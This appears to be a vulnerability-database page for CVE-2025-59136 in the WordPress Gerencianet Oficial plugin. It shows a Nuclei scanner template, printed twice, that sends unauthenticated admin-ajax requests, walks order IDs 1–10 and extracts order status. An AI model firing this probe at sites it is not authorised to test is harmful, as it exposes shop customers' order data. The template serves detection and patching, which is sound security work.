WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure

CVE-2025-59136

Verified

Description

Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data, exploit requires crafted requests.

Severity

Medium

Published Date

April 23, 2026

Template Author

pussycat0x

CVE-2025-59136.yaml

id: CVE-2025-59136

info:
  name: WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data, exploit requires crafted requests.
  impact:
    Attackers can retrieve embedded sensitive data, leading to information disclosure.
  remediation: |
    Update to the latest version beyond 3.1.3.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gerencianet-official/gerencianet-oficial-313-unauthenticated-information-exposure
    - https://patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability
  metadata:
    verified: true
  tags: cve,cve2025,wordpress,wp-plugin,gerencianet,woocommerce

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=gn_check_order_status&order_id={{order_id}}

    attack: batteringram
    payloads:
      order_id:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"current_status"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: order_status
        json:
          - '.data.current_status'
# digest: 490a0046304402201c626019732d75952114c5ecb2bfcd63d197df468efb7729fa47e99be9415f8d02204b1fc5c7df4903bee717fc3ffb96bfd8451b22954f40429c1e4abee8da4b499b:922c64590222798bb761d5b6d8e72950

5.0Severity

CVSS Metrics

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gerencianet-official/gerencianet-oficial-313-unauthenticated-information-exposure https://patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability

Remediation Steps

Update to the latest version beyond 3.1.3.

id: CVE-2025-59136

info:
  name: WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data, exploit requires crafted requests.
  impact:
    Attackers can retrieve embedded sensitive data, leading to information disclosure.
  remediation: |
    Update to the latest version beyond 3.1.3.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gerencianet-official/gerencianet-oficial-313-unauthenticated-information-exposure
    - https://patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability
  metadata:
    verified: true
  tags: cve,cve2025,wordpress,wp-plugin,gerencianet,woocommerce

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=gn_check_order_status&order_id={{order_id}}

    attack: batteringram
    payloads:
      order_id:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"current_status"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: order_status
        json:
          - '.data.current_status'
# digest: 490a0046304402201c626019732d75952114c5ecb2bfcd63d197df468efb7729fa47e99be9415f8d02204b1fc5c7df4903bee717fc3ffb96bfd8451b22954f40429c1e4abee8da4b499b:922c64590222798bb761d5b6d8e72950

WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps